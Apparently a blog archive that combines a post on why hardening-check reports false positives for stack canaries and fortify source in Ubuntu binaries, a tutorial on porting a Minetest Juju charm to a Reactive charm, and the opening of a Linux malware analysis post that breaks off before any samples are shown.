    DF *UND*	00000 (GLIBC_2.2.5) nl_langinfo
    DF *UND*	00000 (GLIBC_2.2.5) strcoll
    DF *UND*	00000 (GLIBC_2.2.5) mktime
    DF *UND*	00000 (GLIBC_2.2.5) __freading
    DF *UND*	00000 (GLIBC_2.2.5) fwrite_unlocked
    DF *UND*	00000 (GLIBC_2.2.5) realloc
    DF *UND*	00000 (GLIBC_2.2.5) stpncpy
    DF *UND*	00000 (GLIBC_2.2.5) setlocale
    DF *UND*	00000 (GLIBC_2.3.4) __printf_chk
    DF *UND*	00000 (GLIBC_2.28) statx
    DF *UND*	00000 (GLIBC_2.2.5) timegm
    DF *UND*	00000 (GLIBC_2.2.5) strftime
    DF *UND*	00000 (GLIBC_2.2.5) mempcpy
    DF *UND*	00000 (GLIBC_2.2.5) memmove
    DF *UND*	00000 (GLIBC_2.2.5) error
    DO *UND*	00000 (GLIBC_2.2.5) __progname_full
    DF *UND*	00000 (GLIBC_2.2.5) fseeko
    DF *UND*	00000 (GLIBC_2.2.5) strtoumax
    DF *UND*	00000 (GLIBC_2.2.5) unsetenv
    DF *UND*	00000 (GLIBC_2.2.5) __cxa_atexit
    DF *UND*	00000 (GLIBC_2.2.5) wcstombs
    DF *UND*	00000 (GLIBC_2.3)  getxattr
    DF *UND*	00000 (GLIBC_2.2.5) gethostname
    DF *UND*	00000 (GLIBC_2.2.5) sigismember
    DF *UND*	00000 (GLIBC_2.2.5) exit
    DF *UND*	00000 (GLIBC_2.2.5) fwrite
    DF *UND*	00000 (GLIBC_2.3.4) __fprintf_chk
w   D  *UND*	00000  Base        _ITM_registerTMCloneTable
    DF *UND*	00000 (LIBSELINUX_1.0) getfilecon
    DF *UND*	00000 (GLIBC_2.2.5) fflush_unlocked
    DF *UND*	00000 (GLIBC_2.2.5) mbsinit
    DF *UND*	00000 (LIBSELINUX_1.0) lgetfilecon
    DO *UND*	00000 (GLIBC_2.2.5) program_invocation_short_name
    DF *UND*	00000 (GLIBC_2.2.5) iswprint
    DF *UND*	00000 (GLIBC_2.2.5) sigaddset
    DF *UND*	00000 (GLIBC_2.3)  __ctype_tolower_loc
    DF *UND*	00000 (GLIBC_2.3)  __ctype_b_loc
    DO *UND*	00000 (GLIBC_2.2.5) stderr
    DF *UND*	00000 (GLIBC_2.3.4) __sprintf_chk
220a0 g    DO .data	00008  Base        obstack_alloc_failed_handler
0fcc0 g    DF .text	00128  Base        _obstack_newchunk
0fca0 g    DF .text	00019  Base        _obstack_begin_1
106e0 g    DF .text	00037  Base        _obstack_allocated_p
w   DF *UND*	00000 (GLIBC_2.2.5) __cxa_finalize
    DF *UND*	00000 (GLIBC_2.2.5) free
0fc80 g    DF .text	00015  Base        _obstack_begin
    DF *UND*	00000 (GLIBC_2.2.5) malloc
107b0 g    DF .text	00026  Base        _obstack_memory_used
g    DF .text	00085  Base        _obstack_free

We can see that the Stack Canary fail check is present:

~$ objdump -T /usr/bin/ls | grep __stack_chk_fail
00000      DF *UND*	00000 (GLIBC_2.4)  __stack_chk_fail

We can also see some fortify source functions present:

$ objdump -T /usr/bin/ls | grep chk
    DF *UND*	00000 (GLIBC_2.3.4) __snprintf_chk
    DF *UND*	00000 (GLIBC_2.4)  __mbstowcs_chk
    DF *UND*	00000 (GLIBC_2.4)  __stack_chk_fail
    DF *UND*	00000 (GLIBC_2.3.4) __memcpy_chk
    DF *UND*	00000 (GLIBC_2.3.4) __printf_chk
    DF *UND*	00000 (GLIBC_2.3.4) __fprintf_chk
    DF *UND*	00000 (GLIBC_2.3.4) __sprintf_chk

If hardening-check sees the presence of these functions, it says, yes, it does have the compiler flag enabled. If they are missing, it reports, no, not enabled.

Now we have a good idea how this scanning tool works, lets have a look at a few examples.

Stack Canaries

/usr/bin/clear is the first item on the missing stack canary list. Let’s run it through hardening check:

$ hardening-check /usr/bin/clear
/usr/bin/clear:
 Position Independent Executable: yes
 Stack protected: no, not found!
 Fortify Source functions: yes
 Read-only relocations: yes
 Immediate binding: yes
 Stack clash protection: unknown, no -fstack-clash-protection instructions found
 Control flow integrity: yes

Interesting, “Stack protected: no, not found!”.

Running it through objdump, we look for __stack_chk_fail:

$ objdump -T /usr/bin/clear | grep __stack_chk_fail

We get no output. The function isn’t present. We know from when we manually checked the build log earlier that -fstack-protector-strong is enabled.

So why don’t we see __stack_chk_fail referenced in the ELF header?

The answer is in the Hardening Wiki page, again in the validation section:

If your binary does not make use of character arrays on the stack, it’s possible that “Stack protected” will report “no”, since there was no stack it found to protect. If you absolutely want to protect all stacks, you can add “-fstack-protector-all”, but this tends not to be needed, and there are some trade-offs on speed.

It is likely that /usr/bin/clear does not process any character arrays on the stack, and thus, there is no need for stack canaries to be implemented, and the compiler has made a conscious decision to omit them for performance reasons.

Looking through the rest of the binaries listed under missing stack canaries, most of them don’t do much string processing, making the above conclusion reasonable.

Fortify Source

Let’s move onto the fortify source section.

The first item on the list is /usr/bin/apt. Let’s run this through hardening-check.

$ hardening-check /usr/bin/apt
/usr/bin/apt:
 Position Independent Executable: yes
 Stack protected: yes
 Fortify Source functions: unknown, no protectable libc functions used
 Read-only relocations: yes
 Immediate binding: yes
 Stack clash protection: unknown, no -fstack-clash-protection instructions found
 Control flow integrity: yes

Again, very interesting, we see unknown, no protectable libc functions used.

As mentioned previously, it is very likely looking for __<function>_chk function calls in the ELF header, so let’s see what is present:

$  objdump -T /usr/bin/apt -T | grep chk
00000      DF *UND*	00000 (GLIBC_2.4)  __stack_chk_fail

We only seem to see chk functions related to the stack canary. I suppose this is why hardening-check thinks fortify source is not enabled.

Again, from our manual checking of the buildlog, we know that -D_FORTIFY_SOURCE=2 as well as -O2 are enabled, so the apt binary was built with fortify source enabled. So why doesn’t it show up in the ELF dynamic symbol table?

To answer this, we need to know what fortify source actually protects. This is explained in the feature_test_macros manpage:

$ man feature_test_macros
...
_FORTIFY_SOURCE (since glibc 2.3.4)
Defining this macro causes some lightweight checks to be performed to detect 
some buffer overflow errors when employing various string and memory 
manipulation functions (for example, memcpy(3), memset(3), stpcpy(3),  
strcpy(3), strncpy(3), strcat(3), strncat(3), sprintf(3), snprintf(3),  
vsprintf(3), vsnprintf(3), gets(3), and wide character variants thereof).  
For some functions, argument consistency is checked; for example, a check is 
made that open(2) has been supplied with a mode argument when the specified 
flags include O_CREAT. Not all problems are detected, just some common cases.
...
Some of the checks can be performed at compile time (via macros logic 
implemented in header files), and result in compiler warnings; other checks take
place at run time, and result in a run-time error if the check fails.
...

Okay, so Fortify Source adds some checks to the following functions and their derivatives:

memcpy, memset, stpcpy, strcpy, strncpy, strcat, strncat, sprintf, snprintf, vsprintf, vsnprintf, gets

Let’s check for these in /usr/bin/apt:

$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strncat\|spri
ntf\|snprintf\|vsprintf\|vsnprintf\|gets'

We have our first explanation. If a binary does not call any of memcpy, memset, stpcpy, strcpy, strncpy, strcat, strncat, sprintf, snprintf, vsprintf, vsnprintf, gets, then the compiler doesn’t need to replace them with their __<function>_chk equivalents, and thus it will fail the Fortify Source check by hardening-check.

Now, I did examine /usr/bin/apt under different releases and architectures, and found it had a different result under arm64 on 20.04, that I think is worth talking about:

$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strnca
t\|sprintf\|snprintf\|vsprintf\|vsnprintf\|gets'
00000      DF *UND*	00000  GLIBC_2.17  memcpy

In this case, /usr/bin/apt calls memcpy, So why isn’t there a __memcpy_chk call?

I was reading some documentation, and came across this tidbit in a semi but not really related bug:

There are no _memcpy_chk calls, which means GCC did in all cases what is documented, replace the __builtin__memcpy_chk calls with the corresponding __builtin_memcpy calls and handled that as usually (which isn’t always a library call, there are many different options how a builtin memcpy can be expanded and one can find tune that through various command line options.
It depends on what CPU the code is tuned for, whether it is considered hot or cold code, whether the size is constant and what constant or if it is variable and what alignment guarantees the destination and source has.

Okay, so if we extrapolate this a bit, we can infer that gcc will initially replace calls to memcpy to __memcpy_chk, and then, in a later optimisation run, it can make a conscious descision to optimise __memcpy_chk back to the ordinary memcpy, depending on some attributes, most notably, “whether the size is constant and what constant or if it is variable”.

If /usr/bin/apt only used constant sized arrays of a fixed size, and the size never changes, then there is no need to perform a length check in memcpy. In which case, __memcpy_chk is a waste of time, and gcc optimises it back to the ordinary memcpy.

For a concrete answer, I would need to review the usage of memcpy in the apt source code, but I imagine this is what is happening, and it is reasonable.

But this is how we arrive at no Fortify Source functions being used in /usr/bin/apt, and I imagine the rest of the binaries on the list will follow similarly.

Conclusion

The investigation in this article shows that automated scanning tools cannot determine if Stack Canaries or Fortify Sources have been enabled at compile time, because those protections simply don’t apply to all binaries, as they can, and will be omitted or optimised out, if the compiler determines that they are not applicable or it is safe to proceed without them.

I believe all the binaries on the lists at the beginning of the article are false positives, and I am confident that all binaries in the Ubuntu archive are built with -fstack-protector-strong and -D_FORTIFY_SOURCE=2, except for rare exceptions where they are required to be turned off to workaround bugs or issues. These rare exceptions are always due to good reasons, and should be explicitly documented in the debian/rules file of their source packages.

Hopefully you enjoyed the read, and as always feel free to contact me.

Matthew Ruffell

Learning How to Write Reactive Charms by Porting our Minetest Charm

2021-09-07T00:00:00+00:00

It has been a really long time since my last blog post, so let’s fix that by writing a followup post to my popular article on learning to write Juju Charms, where we wrote a simple Charm to deploy a production ready Minetest server, complete with postgresql integration through Juju relations.

Today, we are going to go a step further and delve into Reactive Charms, where we can define and maintain state through flags. Flags let us have a memory of events that have happened in the past, and only run certain functions to “react” to changes in those flags.

Reactive Charms are primarily written in Python, and there are a lot of different submodules that exist to help you develop your Charm. So buckle up, because we are going to take our little Minetest Charm to the next level.

Original Charms vs Reactive Charms

Original Charms could be written in any language, and we decided to write our old Minetest Charm in bash. Reactive Charms are intended to be developed using Python 3, and to take advantage of the rich Python submodule ecosystem built and maintained by the community, which provides simple blueprints to make great production ready code.

Reactive Charms build on many of the same mechanisms from the older Bash Charms, and you will find that files like metadata.yaml and config.yaml are exactly the same, so we should be able to reuse some code from our old Charm during its port to becoming a Reactive charm.

In that case, make sure you read my previous articles so you have a good understanding of how hook based Charms work:

There are three notable changes between hook Charms and Reactive Charms.

Charmhelpers Library Code

There is a wealth of already implemented functions you can use to help develop your Charm, and they are in the charmhelpers Python module. There is excellent documentation available to help you find what these functions do, and what their API is.

charmhelpers helps you write correct code the first time, by implementing useful things like if a group exists or creating new groups, adding users, or adding users to groups.

You can also do things like get a dictionary of the Charm’s config.yaml, write to the juju log or set juju status information.

Have a look around, and I’m sure you will find all sorts of useful functions to help you write your Charm.

Flags

Reactive Charms have the ability to store state, so you can now selectively run functions only if they meet certain conditions, stored in flags. This is super useful, since you might only want to generate the configuration file once the database has been configured, so you don’t want config-changed to be run before the user relates a database, for example.

It also allows us to implement finite state machines for more complex deployments where you don’t want race conditions or to jump steps, which is particularly useful for managing critical data in storage Charms.

Flags can be named anything you want, and we use methods like set_flag() and clear_flag() to manage them.

Flags are actually implemented in the charms.reactive Python module, and are used as decorators on your functions. There are a whole bunch of different decorators you can use, but the common ones are when(), when_not(), when_any(), hook().

A simple example is to guard against only doing something once, much like a singleton pattern but not as advanced. We can do this by setting a flag:

@when_not('myprogram.installed')
def install_myprogram():
    # Get your things installed...
    
    set_flag('myprogram.installed')

When your Charm is first deployed, myprogram.installed won’t be set, so we will run the install_myprogram() function, and then once we set myprogram.installed we can no longer fulfil the @when_not() decorator, and we won’t run install_myprogram() again.

Neat.

Layers

Layers are all about incorporating the flags and hooks from other Charms, and putting them to use in your own Charm, helping the code reuse and correctness.

Layers are effectively libraries you can import, and are mostly set and forget with no need to write any code to make them work. You can set some options in the layer definition file, and they will be passed to layer functions as needed.

In this guide, we will take advantage of the basic and apt layers, as well as the pgsql interface for database management. I will show you how they work slightly later on.

Reactive Charm Writing Method

I’m again going to be following along the Reactive Charm Documentation as well as the recommended Reactive Charm Tutorial found on discourse.

What You Will Need To Get Started

We will need to have Juju installed, and also charm tools. We can get both of these from the Snap Store.

$ sudo snap install --classic juju
$ sudo snap install --classic charm

Create Charm Directory Structure

Charms are a collection of text files, which are primarily split up into Python scripts and YAML configuration files.

Much like last time, we will make a directory for our Charms to live in, but this time, we create two more directories, layers and interfaces.

$ mkdir -p ~/charms
$ mkdir -p ~/charms/layers
$ mkdir -p ~/charms/interfaces

We also need to setup some environment variables for Charm tools to use, so add the following to your ~./bashrc:

$ cat << EOF | tee --append ~/.bashrc
export CHARM_LAYERS_DIR="~/charms/layers"
export CHARM_INTERFACES_DIR="~/charms/interfaces"
EOF
$ source ~/.bashrc

We can use Charm tools to automatically generate the correct directory structure for us, so run:

$ cd ~/charms/layers
$ charm create minetest-server

You should now have these files in ~/charms/layers/minetest-server:

Edit the README File

We need a README file to tell our users what our Charm is about, how to deploy it, and how to scale it. We will tweak what we did last time, and the following should do:

Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.

This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.

To deploy:

$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju relate postgresql:db minetest-server:db
$ juju expose minetest-server

Edit the metadata.yaml File

The role of metadata.yaml has not changed, and it still tells Juju what the Charm is called, what it does, who wrote it, what Ubuntu distribution it is compatible with, and what interfaces are exposed and required to function.

name: minetest-server
summary: Minetest is a opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
    Minetest is a fun, opensource voxel game engine that can be customised with
    different game modes and mods.
    This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- hirsute
- focal
provides:
  server:
    interface: minetest
requires:
  db:
    interface: pgsql

Describe Configuration Options in config.yaml

Since we want users of our Charm to be able to configure the Minetest server to suit their needs, such as changing the server message of the day, or the port it is being served on, we need to define configuration variables in config.yaml.

This is also pretty straightforward.

The only thing to note is you should carefully consider what options you want to expose to your users. Users don’t really care about the fine details, so only expose what most people will understand and use.

Saying that, make sure you set sensible defaults. All Charms should work out of the box on first deployment. If people are interested in changing config, they will, otherwise they will leave everything alone.

An example config is: (inspired by the existing config.yaml in James Tait’s older minetest charm)

options:
    port:
        default: 30000
        description: Server port to listen on
        type: int
    server-name:
        default: "Minetest server"
        description: Name of the server
        type: string
    server-description:
        default: "Juju deployed Minetest server"
        description: Description of server
        type: string
    motd:
        default: "Welcome!"
        description: Message of the day
        type: string
    strict-protocol-version-checking:
        default: "false"
        description: Set to true to disallow old clients from connecting
        type: string
    creative-mode:
        default: "false"
        description: Set to true to enable creative mode (unlimited inventory)
        type: string
    enable-damage:
        default: "false"
        description: Enable players getting damage and dying
        type: string
    default-password:
        default: ""
        description: New users need to input this password
        type: string
    default-privs:
        default: "build,shout"
        description: |
            Available privileges: build, shout, teleport, settime, privs, ban
            See /privs in game for a full list on your server and mod configuration
        type: string
    enable-pvp:
        default: "true"
        description: Whether to enable players killing each other
        type: string

Set the Copyright of the Charm

All Charms should include a copyright file, which includes details about the copyright and licensing status of the files inside the Charm.

We will again use the debian/copyright file format to license our charm, by placing the following in a file called copyright.

We will take the OpenStack Keystone Charm copyright file as inspiration, so the below will do:

Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0

Files: *
Copyright: 2021, Matthew Ruffell.
License: GPL-3

License: GPL-3
 This package is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 3 of the License, or
 (at your option) any later version.
 .
 This package is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
 .
 You should have received a copy of the GNU General Public License
 along with this package; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301 USA
 .
 On Debian systems, the complete text of the GNU General
 Public License can be found in `/usr/share/common-licenses/GPL-3'.

Make an Icon for the Charm Store

If you want your Charm to look nice on the Charm store listing or on the Juju GUI, then you should probably set an icon.

Open up icon.svg in Inkscape or whatever vector editor you like, and make a nice icon:

I used the icon found at /usr/share/icons/hicolor/scalable/apps/minetest.svg to make this icon.

Defining Layers and Their Options

Layers are a mechanism to integrate related Charms into your own Charm. Think of them as libraries you can import and leverage to perform tasks correctly, so you don’t have to get into the specifics yourself.

For example, take the layer:apt layer. This implements package management via apt, and it will automatically be called when the Charm is deployed in the install phase. We can include some options in the options: section, and we can tell it to automatically install minetest, without having to specify anything more. The days of manually writing apt install minetest are over.

The layer:basic layer implements basic hooks like start, stop, and uses magic to link different hooks and conditions to flags. This is the layer that is also responsible for autogenerating our hooks directory when we run charm build.

Finally, we also specify the interface:pgsql interface, which tells Juju that we will be using the postgresql charm, and that we will be using related flags like db.connected and db.database.available.

Our final layers.yaml looks like the following:

includes:
  - 'layer:basic'
  - 'layer:apt'
  - 'interface:pgsql'
options:
  apt:
    packages:
      - minetest

Creating Templates for Game Configuration and System Service Files

Templates are a wonderful new addition to Reactive Charms. They allow us to define our configuration files in one place, and fill out any unknown variables

$ mkdir templates

We will need two templates. One, a systemd service file to run minetest on boot, and the other will be the actual minetest configuration.

Let’s do the systemd service first.

Make a file called minetest.service and put the following service description in it:

[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page

[Service]
Type=simple
User=minetest

ExecStart=/usr/games/minetest --server

ExecStop=/bin/kill -2 $MAINPID

[Install]
WantedBy=multi-user.target

Note, we can use the Jinja2 templating engine to fill variables for us when we render the file later on. We can place values within '{{ object.attribute }}' style syntax.

For example, we can fetch the server-name configuration from the Juju config entries with '{{ config["server-name" }}'. We will pass in database details later, and use my_database as an object placeholder for now.

Let’s use this information to create the minetest configuration file. Name it world.mt and fill it with:

port =  {{ config["port"] }} 
server_name =  {{ config["server-name"] }} 
server_description =  {{ config["server_description"] }} 
motd =  {{ config["motd"] }} 
strict_protocol_version_checking =  {{ config["strict-protocol-version-checking"] }} 
creative_mode =  {{ config["creative-mode"] }} 
enable_damage =  {{ config["enable-damage"] }} 
default_password =  {{ config["default-password"] }} 
default_privs =  {{ config["default-privs"] }} 
enable_pvp =  {{ config["enable-pvp"] }} 
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host= {{ database["private-address"] }}  port= {{ database["port"] }}  user= {{ database["user"] }}  password= {{ database["password"] }}  dbname= {{ database["database"] }} 
pgsql_player_connection = host= {{ database["private-address"] }}  port= {{ database["port"] }}  user= {{ database["user"] }}  password= {{ database["password"] }}  dbname= {{ database["database"] }} 

Writing the Actual Deployment and Management Code

In Reactive Charms, we implement the logic to manage the Charm in reactive/charm_name.py, or in our case, reactive/minetest_server.py.

Have a read of the final code, and I’ll commentate how it works below.

from charms.reactive import when, when_not, set_flag
from charmhelpers.core.host import group_exists, add_group, user_exists, adduser, mkdir, service, service_restart, chownr
from charmhelpers.core.templating import render
from charmhelpers.core.hookenv import log, status_set, application_version_set, config, relations_of_type
from charmhelpers.fetch import get_upstream_version

@when('apt.installed.minetest')
@when_not('minetest-server.installed')
def install_minetest_server():
    log("Setting up users and groups", 'info')
    
    # Add minetest group to system if it doesn't exist
    if not group_exists('minetest'):
        add_group('minetest', system_group=True)
    
    # Add minetest user to system if it doesn't exist
    if not user_exists('minetest'):
        adduser('minetest', system_user=True, primary_group='minetest',
                home_dir='/home/minetest')
    
    # Ensure the minetest world directory exists
    mkdir(path='/home/minetest/.minetest/worlds/world',
          owner='minetest',
          group='minetest',
          perms=0o775)
    
    # Ensure permissions are correct
    chownr(path='/home/minetest',
           owner='minetest',
           group='minetest',
           chowntopdir=True)
    
    log("Installing systemd service files", 'info')
    
    # Install the systemd service file
    render(source='minetest.service',
           target='/etc/systemd/system/minetest.service',
           owner='root',
           group='root',
           perms=0o644,
           context={
           })
    
    # Set the version number in Juju to what was installed
    application_version_set(get_upstream_version('minetest'))
    
    # Enable the minetest service
    service('enable', 'minetest.service')
    
    # We are all installed now, we don't need to call this function again
    set_flag('minetest-server.installed')
    
    
@when('config.changed')
@when('minetest.database.configured')
def minetest_regenerate_configuration():
    status_set('maintenance', 'Configuring minetest')
    
    # Fetch our minetest and database configuration variables
    my_config = config()
    my_database = relations_of_type('db')[0]
    
    log("Installing minetest configuration file", 'info')
    
    # Populate the configuration file and install it in place
    render(source='world.mt',
           target='/home/minetest/.minetest/worlds/world/world.mt',
           owner='minetest',
           group='minetest',
           perms=0o664,
           context={
               'config':my_config,
               'database':my_database,
           })
    
    # Restart the minetest service to take on new config
    service_restart('minetest.service')
    
    # Tell Juju that minetest is good to go
    status_set('active', 'Configuration file written')

@when('db.database.available')
def database_connected():
    # We have a database now, so we can generate config anytime now
    set_flag('minetest.database.confgured')
    
    # Generate the config file with database credentials
    minetest_regenerate_configuration()

@when_not('db.connected')
def missing_database():
    status_set('blocked', 'Relation to postgresql required')

We first import all the functions we need from the charmhelpers python module, which is actually quite a lot for our small piece of code, but it’s okay, since we want charmhelpers to do our heavy lifting.

We next have a function install_minetest_server(), that acts as a singleton like I described when I mentioned how flags work. It has an extra condition though, and that is @when('apt.installed.minetest'). This ensures that we only call install_minetest_server() once the apt layer has completed installing the minetest package.

In install_minetest_server(), we set up the minetest user and group, set up a /home directory and world directory, and install a systemd service file. We also get the minetest package version and expose it to Juju for pretty juju status prompts with our actual minetest version.

Next up we have minetest_regenerate_configuration() which collects the Charms config parameters, and database relation parameters, and renders the variables into the template config file we created above. Smart right? I thought so. We also restart the systemd service to load the new configuration, and set the Charm’s status to active.

We used two flags for minetest_regenerate_configuration(), which makes sure we only call the function when both config.changed and minetest.database.confgured is set. config.changed acts like a hook in reality, and minetest.database.confgured is what actually stops the function from being run before a database is available.

To pull this off, we have two functions, missing_database() and database_connected(). missing_database() sets the Charms status to blocked when there isn’t a postgresql relation present, which is what we want, since without a backing database, we can’t play minetest.

database_connected() is called when we have a postgresql relation, and the database is created and we have user credientals available. This is from the db.database.available flag that the postgresql interface sets. We take the opportunity to set ‘minetest.database.confgured’ so we can go ahead and render our configuration, and then manually call minetest_regenerate_configuration() to make that happen.

Its not too complicated, and it actually turned out to be less code than the old hook based Charm.

Deploying the Charm

Now that everything is in place, let’s go ahead and deploy the Charm to our machines, and get our minetest server running.

Creating the Controller

We will be using LXD as the cloud backend for our Juju model today, so go ahead and deploy a juju controller with the “localhost” backend:

$ juju bootstrap --bootstrap-series=hirsute localhost lxd-controller
Creating Juju controller "lxd-controller" on localhost/localhost
Looking for packaged Juju agent version 2.9.12 for amd64
Located Juju agent version 2.9.12-ubuntu-amd64 at https://streams.canonical.com/juju/tools/agent/2.9.12/juju-2.9.12-ubuntu-amd64.tgz
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance(s) on localhost/localhost...
 - juju-6b05e2-0 (arch=amd64)                 
Installing Juju agent on bootstrap instance
Fetching Juju Dashboard 0.8.1
Waiting for address
Attempting to connect to 10.29.181.61:22
Connected to 10.29.181.61
Running machine configuration script...
Host key fingerprint is SHA256:H0KFu2A5tmmM2blQ5dJ70iMhav+6RJ+4wKrkTp08y2M
+---[RSA 2048]----+
|         ..      |
|        o.       |
|       =..       |
|      X.=        |
|     X.OS=.      |
|  o.B.Bo=++.     |
| o *o+o.o+..     |
|+ .Eooo.         |
|o+oo. ++.        |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.29.181.61 to verify accessibility...

Bootstrap complete, controller "lxd-controller" is now available
Controller machines are in the "controller" model
Initial model "default" added

Note, I used --bootstrap-series=hirsute to use Hirsute as the operating system for the controller.

We can confirm our controller deployed properly with juju controllers:

Looking at juju status we now have a nice empty model:

Deploying the PostgreSQL Charm

Our Minetest Charm depends on postgresql as a database backend to store our player information and world data, so let’s go ahead and deploy it first.

Things have changed slightly from the last time I wrote a blog post, with Charms now being able to be found on Charmhub, instead of the Charm Store.

So, we go to Charmhub, and search for postgresql, and come across the entry postgresql at revision 235.

Deploying it is simple, we just run:

$ juju deploy postgresql
Located charm "postgresql" in charm-hub, revision 235
Deploying "postgresql" from charm-hub charm "postgresql", revision 235 in channel stable

and we can watch juju status while we wait.

Eventually it will complete, and postgresql will be ready to use:

Proofing and Building our Minetest Charm

We can do a quick sanity check over our charm with charm proof, which tells us if we are missing anything critical, or need to change some boilerplate code.

In our case, we are missing some hooks, which we will add later.

If everything looks okay, go ahead and build your charm with charm build:

All green, fantastic! Time to deploy.

Deploying our Minetest Charm

Our Charm was built and placed into /tmp/charm-builds/minetest-server, so point Juju at that location, and deploy away:

$ juju deploy /tmp/charm-builds/minetest-server
Located local charm "minetest-server", revision 0
Deploying "minetest-server" from local charm "minetest-server", revision 0

We can watch juju status like normal to see how it went:

Ouch. Error in the install hook. Not a problem, Juju can tell us what went wrong in an instant, with the juju debug-log command. Run that, and let’s see what went wrong:

Silly me, seems I forgot to include a logger module, not to worry, we can fix that right up. Add the following to minetest-server.py at the top:

from charmhelpers.core.hookenv import log, status_set

and we should be good to go. But if you happen to have a different problem, don’t forget you can juju ssh minetest-server/0 to get a shell inside the minetest LXD container, where you can debug from there.

The charm itself lives in /var/lib/juju/agents/unit-minetest-server-0/charm/, so cd into there, edit minetest-server.py in vim, save and exit.

We don’t have to redeploy the entire Charm to get small bugfixes, and production servers you might not have that luxury at all. Instead, we can run:

$ juju resolved minetest-server/0

and this tells Juju that we fixed the errors, and to re-try that hook again. If we check juju status, it seems to have worked:

We are now waiting on our database connection, so let’s make the relation happen:

$ juju relate postgresql:db minetest-server:db

Checking juju status now, we see all green, and that our configuration file has been written correctly:

This is promising! Let’s expose the port:

$ juju expose minetest-server

Open up minetest, and connect to the server listed at private-address in juju status, which is 10.29.181.198 in my case, on port 30000, which we set in our configuration:

And click connect, and wow it works! We find ourselves in a snowy world, all powered by Minetest + Postgresql + Juju with Reactive Charms. Very fancy, and production ready.

Debugging the Charm

Now that we have written our Reactive Charm, we also need to be able to debug it and know what to do when things go wrong. These tips should help.

Getting Debug Logs

As mentioned when we were writing the Reactive code, your first port of call when you run into a problem is to run juju debug-log. This gives you the log outputs of all active running Charms, and any error messages like stack traces are very prominent and repeated often, so you won’t miss anything.

Make sure to make use of log() from charmhelpers.core.hookenv, and use it to write useful information to the Juju log, as well to print debug information like a print statement or printk. I did this a lot when writing this charm, so I could see the contents of relations_of_type() with Python’s dir().

It’s also very helpful to have juju debug-log running in a window on a second screen so you can keep a detailed watch of deployment progress when you are developing your charm.

Debugging Hooks and Examining Flags at Runtime

In the previous article, we used juju debug-hooks application-name/unit to access a tmux session to see what data is exchanged during various hooks like db-relation-joined and config-changed.

We can still do all of that, but juju debug-hooks has gotten more powerful for Reactive Charms.

If you run:

$ juju debug-hooks minetest-server/5

You get the same tmux session:

Now, we can run hooks manually by executing the python scripts that are backing them, in the hooks directory of the Charm.

The session is opened to the Charm directory, at var/lib/juju/agents/unit-minetest-server-5/charm, so we can ls hooks/ to see what we can run:

If we wanted to run config-changed manually, we can do this with:

$ python3 hooks/config-changed

and it runs. Very useful if you need to watch what is happening in juju debug-log concurrently.

But what happens if your flags aren’t getting hit? No worries, we can see what the values for the flags are by running:

$ charms.reactive -p get_flags

Not only can we see what they are actually called (which is useful in itself, I thought db.available was a flag, but it was actually called db.database.available instead, and get_flags() told me this), but we can also see if they are set or unset, with commands like all_flags_set(), get_unset_flags(), is_flag_set(), and we can also change flags with set_flag(), clear_flag(), toggle_flag(). Very useful.

Cleaning Up

Once we have had our fun and want to reclaim some disk space back, we can tear down and remove the deployment with:

$ juju remove-application minetest-server
removing application minetest-server
$ juju remove-application postgresql
removing application postgresql

You can check juju status to keep an eye on progress. If anything gets stuck you can forcefully remove the machine number 5 with:

$ juju remove-machine 5 --force

If you want to remove your controller, then run:

$ juju destroy-controller lxd-controller --destroy-all-models
WARNING! This command will destroy the "lxd-controller" controller.
This includes all machines, applications, data and other resources.

Continue? (y/N):y
Destroying controller
Waiting for hosted model resources to be reclaimed
Waiting for 1 model
All hosted models reclaimed, cleaning up controller machines

Conclusion

In this article we revisited writing Juju Charms, this time taking the more modern and robust Reactive Charms for a spin. We ported our simple Minetest Charm to Reactive, which was quite straightforward, and managed to make our code simpler than when had hook based Charms.

I enjoyed digging into all the new Charmhelper functionality and getting my head around how flags work, and I hope it has been useful with helping you to write your own Reactive Charms.

Hopefully you enjoyed the read, and as always feel free to contact me.

Matthew Ruffell

Analysis of the dovecat and hy4 Linux Malware

2020-10-27T00:00:00+00:00

A few days ago, a case came in which had some rather odd symptoms, such as processes using high amounts of CPU and memory, and running from the /tmp directory.

After asking for some logs, and some samples of the binaries, it became obvious that the system was compromised, and was now running some interesting malware.

In this post, we are going to look into the malware called dovecat, which turned out to be a cryptominer, and hy4, which is a IRC botnet malware dropper.

I’m pretty excited, as I haven’t analysed any Linux malware before, and this is real life stuff pulled directly from a production machine, so it still has its fangs intact.

Let’s get started.

Problem Description

This case caught my eye as soon as I saw it in the queue. The description mentions that a process called dovecat was using a large amount of CPU time and most of the system’s memory, and was causing the machine to run slowly.

dovecat did not seem to match any service the system was running, and there are files in the /tmp directory owned by the service which is running the dovecat process. It all looked rather suspicious, and a case was filed.

Now, the description alone raises a bunch of red flags. Is the dovecat executable itself in /tmp? Are the files in /tmp configuration, or more malware? No legitimate programs place files in /tmp for anything other than temporary storage. Malware only use /tmp since any user has the ability to write there.

We needed more information, so we asked for a sosreport. The logs were extremely interesting. The system itself is Ubuntu 18.04, but it is massively out of date. It looks like it hasn’t been patched in 1 - 2 years. Here’s what I found:

Firstly, looking at ps aux, we can see that dovecat is indeed running from /tmp, as the system daemon user:

